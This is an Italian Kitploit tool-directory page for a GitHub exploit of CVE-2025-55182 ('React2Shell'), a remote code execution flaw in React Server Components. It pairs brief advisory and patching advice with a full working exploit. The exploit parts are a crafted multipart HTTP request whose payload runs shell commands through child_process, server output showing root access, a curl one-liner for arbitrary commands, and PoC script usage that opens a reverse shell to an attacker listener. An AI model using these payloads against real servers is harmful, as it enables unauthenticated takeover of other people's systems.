Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182 — CVE-2025-55182 | Kitploit
Strumenti/GitHubGitHub/0xblackash/cve-2025-55182
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHub0xblackash/cve-2025-55182

CVE-2025-55182

CVE-2025-55182

Vedi Repository
15 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2025-55182 — React2Shell

hq720

Severity CVSS Type Status

CVE-2025-55182 è una vulnerabilità critica di Esecuzione Remota di Codice (RCE) che colpisce React Server Components (RSC).


📌 Panoramica

Questa vulnerabilità consente a aggressori non autenticati di eseguire codice arbitrario su server vulnerabili.

Il problema ha origine dalla deserializzazione non sicura negli endpoint delle funzioni server di React Server Component. Una validazione inadeguata consente a richieste appositamente create di eseguire payload dannosi.


🧨 Impatto

  • 🌍 Sfruttabile in rete
  • 🔓 Nessuna autenticazione richiesta
  • ⚡ Bassa complessità d'attacco
  • 💥 Compromissione totale del server possibile
  • 📈 Punteggio CVSS: 10.0 (Massima Gravità)

Poiché i framework basati su React sono ampiamente distribuiti, la superficie d'attacco è estremamente ampia.


📦 Pacchetti Interessati

Le versioni vulnerabili includono:

root@kitploit:~
react-server-dom-webpack   19.0.0 – 19.2.0
react-server-dom-parcel    19.0.0 – 19.2.0
react-server-dom-turbopack 19.0.0 – 19.2.0

I framework costruiti su questi pacchetti (ad esempio, app Next.js che utilizzano versioni vulnerabili) potrebbero essere anch'essi interessati.


🔎 Causa Tecnica

Il difetto è causato da:

  • Gestione non sicura dell'input serializzato
  • Deserializzazione lato server che avviene prima della validazione rigorosa
  • Mancanza di una protezione adeguata degli endpoint

Ciò consente agli aggressori di creare payload dannosi che vengono eseguiti sul server.


🛠 Rimedio

✅ Azioni Immediati

  • Aggiornare a versioni di React corrette (19.2.1 o successive)
  • Ricostruire e ridistribuire le applicazioni
  • Controllare gli endpoint RSC esposti
  • Monitorare i log per richieste POST sospette

🧪 Suggerimenti per il Rilevamento

Cercare:

  • Richieste POST inaspettate a endpoint RSC
  • Payload serializzati sospetti
  • Esecuzione di comandi lato server inusuale

📚 Riepilogo

CategoriaValore
VulnerabilitàEsecuzione Remota di Codice
Autenticazione Richiesta❌ No
Vettore d'Attacco🌐 Rete

Come sfruttare

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Restituirà:

root@kitploit:~
HTTP/1.1 500 Internal Server Error
Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
x-nextjs-cache: HIT
x-nextjs-prerender: 1
Content-Type: text/x-component
Date: Fri, 05 Dec 2025 11:53:05 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 195

0:{"a":"$@1","f":"","b":"PAoMR732SpRI6Xw9cbfbD"}
1:E{"digest":"uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}

CVE-2025-55182 2 CVE-2025-55182 3 CVE-2025-55182 4

Utilizzo

root@kitploit:~
┌──(kali㉿kali)-[~/Downloads]
└─$ curl -i -X POST http://10.48.133.212:3000/ \
-H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW" \
-H "Next-Action: x" \
-H "Next-Router-State-Tree: b5dce965" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" \
--data-binary $'------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name="0"\r\n\r\n{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\\"$B1337\\\"}","_response":{"_prefix":"var res=process.mainModule.require(\'child_process\').execSync(\'<COMMAND>\').toString().trim();;;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest:`${res}`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name="2"\r\n\r\n[]\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW--'
HTTP/1.1 500 Internal Server Error
Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
x-nextjs-cache: HIT
x-nextjs-prerender: 1
Content-Type: text/x-component
Date: Sat, 28 Feb 2026 10:19:04 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

0:{"a":"$@1","f":"","b":"3WpzTMYEK9QGOeqIBQxrR"}
1:E{"digest":"287088506"}
CVE-2025-55182 5 CVE-2025-55182 6
root@kitploit:~
sudo python3 react2shell_poc.py http://10.48.133.212:3000 --cmd "whoami"
  • Output: ubuntu (o simile).
root@kitploit:~
sudo python3 react2shell_poc.py http://10.48.133.212:3000 --cmd "id"

Per reverse shell:

  • Listener: nc -lvnp 4444
  • Esegui: sudo python3 react2shell_poc.py http://10.48.133.212:3000 --rev-shell --rev-ip YOUR_IP --rev-port 4444
  • Dovrebbe connettersi di ritorno; la risposta mostrerà 'shell_started' nel digest.

⚠️ Nota Finale

Se la tua applicazione utilizza React Server Components, applica la patch immediatamente. I ritardi aumentano significativamente il rischio di esposizione.


Scarica lo strumento
Gravità🔴 Critica
Sfruttato in Natura⚠️ Sì